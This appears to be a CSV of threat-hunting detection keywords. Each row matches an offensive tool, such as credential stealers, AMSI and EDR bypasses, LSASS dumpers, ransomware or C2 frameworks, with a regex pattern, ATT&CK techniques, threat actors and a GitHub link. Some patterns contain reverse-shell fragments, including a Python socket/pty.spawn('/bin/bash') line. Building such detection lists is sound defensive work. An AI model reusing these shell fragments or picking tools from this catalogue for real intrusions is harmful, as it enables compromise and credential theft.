"*s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(*os.dup2(s.fileno*pty.spawn(""/bin/bash*",".{0,1000}s\=socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\)\;s\.connect\(.{0,1000}os\.dup2\(s\.fileno.{0,1000}pty\.spawn\(\""\/bin\/bash.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","57814" "*s0md3v*Striker*",".{0,1000}s0md3v.{0,1000}Striker.{0,1000}","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Vulnerability Scanner","https://github.com/s0md3v/Striker","1","1","N/A","N/A","N/A","10","2271","451","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z","57815" "*S12cybersecurity/Admin2Sys*",".{0,1000}S12cybersecurity\/Admin2Sys.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","N/A","10","1","54","19","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z","57816" "*S12cybersecurity/RDPCredentialStealer*",".{0,1000}S12cybersecurity\/RDPCredentialStealer.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","57817" "*S1ckB0y1337/TokenPlayer*",".{0,1000}S1ckB0y1337\/TokenPlayer.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","57818" 
"*S1lkys/SharpKiller*",".{0,1000}S1lkys\/SharpKiller.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","57819" "*S2l3aUFuZENNRA==*",".{0,1000}S2l3aUFuZENNRA\=\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57820" "*S2l3aUFuZENNRA==*",".{0,1000}S2l3aUFuZENNRA\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57821" "*s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd.onion*",".{0,1000}s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57822" "*S3cretP4ssw0rd!*",".{0,1000}S3cretP4ssw0rd!.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","57823" "*S3cur3Th1sSh1t/Amsi-Bypass-Powershell*",".{0,1000}S3cur3Th1sSh1t\/Amsi\-Bypass\-Powershell.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","57824" "*S3cur3Th1sSh1t/MultiPotato*",".{0,1000}S3cur3Th1sSh1t\/MultiPotato.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","57825" "*S3cur3Th1sSh1t/PowerSharpPack*",".{0,1000}S3cur3Th1sSh1t\/PowerSharpPack.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","57826" "*S3cur3Th1sSh1t/SharpOxidResolver*",".{0,1000}S3cur3Th1sSh1t\/SharpOxidResolver.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 
- T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","57827" "*S3cur3Th1sSh1t/SharpVeeamDecryptor*",".{0,1000}S3cur3Th1sSh1t\/SharpVeeamDecryptor.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","1","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","57828" "*S3N4T0R-0X0/Checkmate*",".{0,1000}S3N4T0R\-0X0\/Checkmate.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","1","N/A","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","57829" "*s3scanner -*",".{0,1000}s3scanner\s\-.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57830" "*s3scanner dump *",".{0,1000}s3scanner\sdump\s.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57831" "*s3scanner scan *",".{0,1000}s3scanner\sscan\s.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - 
T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57832" "*S3Scanner-master*",".{0,1000}S3Scanner\-master.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57833" "*s4u.x64.c*",".{0,1000}s4u\.x64\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","57834" "*s4u.x64.o*",".{0,1000}s4u\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","57835" 
"*S4U2self.py*",".{0,1000}S4U2self\.py.{0,1000}","offensive_tool_keyword","noPac","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","57836" "*S4uDelegator.*",".{0,1000}S4uDelegator\..{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57837" "*S4uDelegator.exe*",".{0,1000}S4uDelegator\.exe.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57838" "*S4ULogonShell.exe*",".{0,1000}S4ULogonShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57839" "*S4Util - Help for ""enum"" command*",".{0,1000}S4Util\s\-\sHelp\sfor\s\""enum\""\scommand.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57840" "*S4UTomato 
1.0.0-beta*",".{0,1000}S4UTomato\s1\.0\.0\-beta.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57841" "*S4UTomato.csproj*",".{0,1000}S4UTomato\.csproj.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57842" "*S4UTomato.exe*",".{0,1000}S4UTomato\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57843" "*S4UTomato.lib*",".{0,1000}S4UTomato\.lib.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57844" "*S4UTomato.sln*",".{0,1000}S4UTomato\.sln.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57845" 
"*S4UTomato-master*",".{0,1000}S4UTomato\-master.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57846" "*S74r77Hr34D(*",".{0,1000}S74r77Hr34D\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","57847" "*s74r787Hr34D(*",".{0,1000}s74r787Hr34D\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","57848" "*s7scan*",".{0,1000}s7scan.{0,1000}","offensive_tool_keyword","Github Username","s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardware version. network configuration and security parameters. 
It is completely written in Python.","T1046 - T1018 - T1049 - T1040 - T1016 - T1057","TA0043 - TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/klsecservices/s7scan","1","1","N/A","N/A","N/A","2","139","46","2018-12-28T12:11:56Z","2018-10-12T08:52:04Z","57849" "*sa7mon/S3Scanner*",".{0,1000}sa7mon\/S3Scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57850" "*SaadAhla/dropper*",".{0,1000}SaadAhla\/dropper.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","N/A","10","","N/A","","","","57851" "*SaadAhla/UnhookingPatch*",".{0,1000}SaadAhla\/UnhookingPatch.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","57852" "*SABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A*",".{0,1000}SABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","#base64","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","57853" "*sadshade/veeam-creds*",".{0,1000}sadshade\/veeam\-creds.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","57854" "*safari_in_operator_side_effect.*",".{0,1000}safari_in_operator_side_effect\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57855" "*safari_proxy_object_type_confusion.*",".{0,1000}safari_proxy_object_type_confusion\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57856" "*SafeBreach-Labs/BITSInject*",".{0,1000}SafeBreach\-Labs\/BITSInject.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","1","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","57857" "*SafeBreach-Labs/DoubleDrive*",".{0,1000}SafeBreach\-Labs\/DoubleDrive.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","57858" "*SafeBreach-Labs/EDRaser*",".{0,1000}SafeBreach\-Labs\/EDRaser.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","57859" "*SafeBreach-Labs/PoolParty*",".{0,1000}SafeBreach\-Labs\/PoolParty.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","57860" "*SafeBreach-Labs/SirepRAT*",".{0,1000}SafeBreach\-Labs\/SirepRAT.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","57861" "*SafeBreach-Labs/WindowsDowndate*",".{0,1000}SafeBreach\-Labs\/WindowsDowndate.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","57862" "*safedv/RustiveDump*",".{0,1000}safedv\/RustiveDump.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","1","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","57863" "*safetydump*",".{0,1000}safetydump.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral 
Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57864" "*SafetyDump.exe *",".{0,1000}SafetyDump\.exe\s.{0,1000}","offensive_tool_keyword","SafetyDump","uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output. This allows the dump to be redirected to a file or straight back down C2 or through other tools","T1003 - T1140 - T1071 - T1105","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","57865" "*safetydump.ninja*",".{0,1000}safetydump\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","57866" "*safetydump.ninja*",".{0,1000}safetydump\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","57867" 
